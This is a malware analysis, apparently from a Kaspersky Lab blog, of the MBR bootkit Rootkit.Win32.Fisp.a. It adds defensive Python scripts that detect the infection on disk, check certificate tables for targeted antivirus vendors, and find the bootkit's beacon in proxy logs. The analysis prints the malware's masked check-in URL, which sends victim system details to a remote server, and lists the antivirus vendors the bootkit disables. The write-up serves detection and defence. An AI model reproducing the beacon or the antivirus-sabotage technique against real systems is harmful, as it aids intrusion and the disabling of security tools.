
The Chinese bootkit

We recently discovered a new bootkit, i.e. a malicious program that infects the hard drive’s boot sector. Kaspersky Lab detects it as Rootkit.Win32.Fisp.a. The bootkit is distributed by Trojan-Downloader.NSIS.Agent.jd, which infects the computers of users who try to download a video clip from a fake Chinese porn site.

This downloader is unusual in that it fetches the other malicious programs through the NSIS installer engine, with all the download links stored in the accompanying NSIS script.

Fragment of the NSIS script for Trojan-Downloader.NSIS.Agent.jd

The dropper Rootkit.Win32.Fisp.a is among the files downloaded by the Trojan-Downloader. It infects the hard drive’s boot sector: it saves the original MBR to the third sector of the disk and overwrites the MBR with its own code. Starting with the fourth sector, it writes an encrypted driver and the rest of its code.

Fragment from the start of the hard disk infected by Rootkit.Win32.Fisp.a

The malicious code gains control as soon as the infected computer boots. The first thing it does is hook the INT 13h disk interrupt by modifying the interrupt vector table. The bootkit then restores the original MBR and resumes the normal boot process.
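The on-disk layout just described (a replacement MBR in the first sector, the original stashed in the third sector, an encrypted body from the fourth sector onwards) leaves two traces a forensic check can look for: a second boot sector in the gap before the first partition that carries the same partition table as the MBR but different boot code, and gap sectors that are near-random instead of zero-filled. The script below is an added example written for this article, not Kaspersky Lab code. It assumes 512-byte sectors, reads the "third sector" as LBA 2 in 0-based numbering, and builds its own constructed disk images (`build_sample_image`) rather than touching real disk data.

```python
import hashlib
import math
import struct
from collections import Counter

SECTOR = 512
MBR_SIGNATURE = b"\x55\xAA"
PARTITION_TABLE = slice(446, 510)   # four 16-byte entries at the end of the MBR


def is_boot_sector(sector: bytes) -> bool:
    return len(sector) == SECTOR and sector[510:512] == MBR_SIGNATURE


def first_partition_lba(mbr: bytes) -> int:
    """Smallest non-zero starting LBA among the four partition entries; the gap
    before it is where this bootkit keeps its saved MBR and encrypted driver."""
    starts = [struct.unpack_from("<I", mbr, 446 + 16 * i + 8)[0] for i in range(4)]
    starts = [s for s in starts if s]
    return min(starts) if starts else 63


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a zero-filled sector, close to 8.0 for ciphertext."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def gap_sectors(image: bytes):
    """Yield (lba, bytes) for every sector between the MBR and the first partition."""
    mbr = image[:SECTOR]
    for lba in range(1, min(first_partition_lba(mbr), len(image) // SECTOR)):
        yield lba, image[lba * SECTOR:(lba + 1) * SECTOR]


def find_saved_mbr(image: bytes) -> list:
    """LBAs (0-based) in the gap that look like a stashed copy of the original MBR:
    valid 0x55AA signature, same partition table as LBA 0, different boot code."""
    mbr = image[:SECTOR]
    return [lba for lba, s in gap_sectors(image)
            if is_boot_sector(s) and s[PARTITION_TABLE] == mbr[PARTITION_TABLE]
            and s[:446] != mbr[:446]]


def high_entropy_gap_sectors(image: bytes, threshold: float = 7.0) -> list:
    """LBAs in the gap whose content is near-random. A freshly partitioned disk has
    zero-filled gap sectors; an encrypted driver body written there does not."""
    return [lba for lba, s in gap_sectors(image) if shannon_entropy(s) >= threshold]


# ---- constructed sample images (not real disk data) ----

def _mbr(boot_code: bytes, first_lba: int = 63) -> bytes:
    code = boot_code[:446].ljust(446, b"\x00")
    # one active type-0x07 entry starting at first_lba, 1000 sectors long
    entry = bytes([0x80, 0, 0, 0, 0x07, 0, 0, 0]) + struct.pack("<II", first_lba, 1000)
    return code + entry + b"\x00" * 48 + MBR_SIGNATURE


def _opaque_sector(seed: bytes) -> bytes:
    """Deterministic stand-in for an encrypted sector (chained SHA-256 output)."""
    out, h = b"", seed
    while len(out) < SECTOR:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:SECTOR]


def build_sample_image(infected: bool, total_sectors: int = 64) -> bytes:
    """Clean image, or the layout the article describes: bootkit MBR at LBA 0, the
    original MBR in the third sector (LBA 2), encrypted body from the fourth
    sector (LBA 3) onwards."""
    original = _mbr(b"\xEB\x3C\x90" + b"ORIGINAL" * 40)
    sectors = [original] + [b"\x00" * SECTOR] * (total_sectors - 1)
    if infected:
        sectors[0] = _mbr(b"\xEB\x3C\x90" + b"BOOTKIT_" * 40)
        sectors[2] = original
        for lba in range(3, 7):
            sectors[lba] = _opaque_sector(b"driver-%d" % lba)
    return b"".join(sectors)


if __name__ == "__main__":
    img = build_sample_image(infected=True)
    print("stashed MBR copies at LBA:", find_saved_mbr(img))          # [2]
    print("high-entropy gap sectors:", high_entropy_gap_sectors(img))  # [3, 4, 5, 6]
```

On a real system the same two functions can be run over the first few hundred sectors read from a raw device or a disk image; the entropy check is the more general of the two, since it flags any encrypted or compressed payload parked in the gap regardless of where a particular bootkit stores its saved MBR.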

Once a certain stage of the system boot has been reached, the bootkit hooks the function ExVerifySuite. The hook replaces the system driver fips.sys with the malicious driver that was written to the start of the hard drive in encrypted form. It should be noted that fips.sys is not required for the operating system to run correctly, so the system does not crash when it is replaced.

The malicious driver registers an image-load callback with PsSetLoadImageNotifyRoutine, so it is notified whenever a process or module is loaded. The callback parses the PE header of the loaded image and examines the ‘Security’ entry of the ‘DataDirectory’ array, i.e. the image’s certificate table. The driver contains a list of strings (see below) that occur in the executables of popular antivirus products. If any of these strings occurs in a loaded image, the driver modifies the image’s entry point, so the image can no longer function properly.

Beijing Rising Information Technology
AVG Technologies
Trend Micro
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,
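The check the driver performs keys on the Security entry of the PE DataDirectory, which points to the Authenticode certificate table appended to a signed binary. The parser below is an added example, not Kaspersky Lab code, intended for triage on the defender’s side: given a binary, it reports which of the vendor strings listed above appear in its certificate table, i.e. whether that binary is one the bootkit’s driver would sabotage. It handles PE32 and PE32+ headers and the 8-byte alignment of WIN_CERTIFICATE entries, and builds its own constructed sample image (`build_sample_pe`) whose certificate body is an opaque placeholder containing a signer name rather than real PKCS#7 data.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # index of the certificate-table entry in DataDirectory

# Vendor strings carried by the driver, as listed in the article.
SIGNER_STRINGS = [
    "Beijing Rising Information Technology",
    "AVG Technologies",
    "Trend Micro",
    "Symantec Corporation",
    "Kaspersky Lab",
    "ESET, spol",
    "Beijing Jiangmin",
    "Kingsoft Software",
    "Keniu Network Technology (Beijing) Co",
    "Qizhi Software (beijing) Co,",
]


def security_directory(pe: bytes):
    """(file_offset, size) of the attribute certificate table, or (0, 0) if absent.
    Unlike the other DataDirectory entries, the Security entry holds a raw file
    offset rather than an RVA, because the table is never mapped into memory."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                           # PE32
        count_off, dd_base = opt + 92, opt + 96
    elif magic == 0x20B:                         # PE32+
        count_off, dd_base = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", pe, count_off)[0]
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return (0, 0)
    return struct.unpack_from("<II", pe, dd_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)


def certificate_blobs(pe: bytes) -> list:
    """Bodies of the WIN_CERTIFICATE entries in the certificate table
    (dwLength, wRevision, wCertificateType, then bCertificate; 8-byte aligned)."""
    off, size = security_directory(pe)
    end, blobs = off + size, []
    while off and off + 8 <= end:
        length = struct.unpack_from("<I", pe, off)[0]
        if length < 8 or off + length > end:
            break                                # malformed table: stop rather than over-read
        blobs.append(pe[off + 8:off + length])
        off += (length + 7) & ~7
    return blobs


def matching_signers(pe: bytes, names=SIGNER_STRINGS) -> list:
    """Which listed vendor strings occur in the image's certificate table. Names in
    X.509 certificates may be ASCII or UTF-16LE, so both encodings are checked."""
    found = []
    for blob in certificate_blobs(pe):
        for name in names:
            if name not in found and (name.encode("ascii") in blob
                                      or name.encode("utf-16-le") in blob):
                found.append(name)
    return found


# ---- constructed sample image (not a real signed binary) ----

def build_sample_pe(signer=None) -> bytes:
    """Minimal PE32: DOS header, PE signature, COFF header, optional header with 16
    data directories, no sections, plus (if signer is given) one WIN_CERTIFICATE
    entry whose body is a placeholder string containing the signer name."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 96 + 16 * 8
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x102)
    headers_len = e_lfanew + 4 + 20 + opt_size
    dirs = [(0, 0)] * 16
    cert = b""
    if signer is not None:
        body = b"PLACEHOLDER-PKCS7:" + signer.encode("ascii")
        cert = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body
        cert += b"\x00" * (-len(cert) % 8)
        dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (headers_len, len(cert))
    opt = struct.pack("<H", 0x10B) + b"\x00" * 90 + struct.pack("<I", 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    return dos + b"PE\0\0" + coff + opt + cert


if __name__ == "__main__":
    print(matching_signers(build_sample_pe("Kaspersky Lab")))   # ['Kaspersky Lab']
    print(matching_signers(build_sample_pe(None)))              # []
```

Pointing `matching_signers` at the bytes of a real signed executable answers the practical question this section raises for a defender: which of the security tools installed on a host sit on the driver’s list, and would therefore fail to start on an infected machine.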

The driver’s main task is to inject into the explorer.exe process an alternative build of Rootkit.Win32.Fisp.a that has downloader functionality. This component sends a request to a remote server reporting information about the victim computer: its operating system, IP address, MAC address, etc.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=

Example of the request sent to server

The malicious program then downloads modifications of Trojan-Dropper.Win32.Vedio.dgs and Trojan-GameThief.Win32.OnLineGames.boas to the victim computer.
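The check-in request shown above has a recognisable shape in web proxy logs: a GET to `tj.aspx` whose `a` parameter carries a Windows version string and which also has a `b` parameter. The detection below is an added example, not Kaspersky Lab code. It runs over a few constructed proxy log lines (timestamp, client, method, URL, status); the server name `ab.example.invalid` is a placeholder, since the article masks the real domain, and the match is on the request shape rather than on the domain so that it still fires if the server moves.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines: timestamp, client, method, URL, status.
# The server name is a placeholder; the article masks the real domain.
SAMPLE_LOG = """\
2011-09-05T10:21:03Z 10.0.0.7 GET http://ab.example.invalid:8081/tj.aspx?a=Windows%20XP%20Service%20Pack%202&b= 200
2011-09-05T10:21:09Z 10.0.0.7 GET http://www.example.invalid/index.aspx?a=1&b=2 200
2011-09-05T10:22:41Z 10.0.0.9 GET http://cdn.example.invalid/static/tj.js 304
2011-09-05T10:25:12Z 10.0.0.12 GET http://ab.example.invalid:8081/tj.aspx?a=Windows%207&b= 200
"""


def parse_line(line: str) -> dict:
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url, "status": int(status)}


def is_fisp_checkin(url: str) -> bool:
    """Shape of the check-in the article shows: a request to /tj.aspx whose 'a'
    parameter carries a Windows version string and which also has a 'b' parameter
    (empty in the captured example, so blank values are kept)."""
    u = urlsplit(url)
    q = parse_qs(u.query, keep_blank_values=True)
    return (u.path.lower().endswith("/tj.aspx")
            and q.get("a", [""])[0].startswith("Windows")
            and "b" in q)


def find_checkins(log_text: str) -> list:
    """One record per matching line: the client that beaconed, the host and port it
    contacted, and the OS string it reported, ready for pivoting on the same log."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["method"] == "GET" and is_fisp_checkin(rec["url"]):
            u = urlsplit(rec["url"])
            q = parse_qs(u.query, keep_blank_values=True)
            hits.append({"ts": rec["ts"], "client": rec["client"], "host": u.hostname,
                         "port": u.port, "os": q["a"][0], "b": q["b"][0]})
    return hits


if __name__ == "__main__":
    for hit in find_checkins(SAMPLE_LOG):
        print(hit)
```

Once a beaconing client is identified this way, the next step on the same log is to look for the follow-up downloads (the Vedio and OnLineGames samples the text mentions) from the same client shortly after the check-in.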

The description outlined above can be summarized in the following diagram:

Kaspersky Lab products successfully detect and neutralize Rootkit.Win32.Fisp.a.
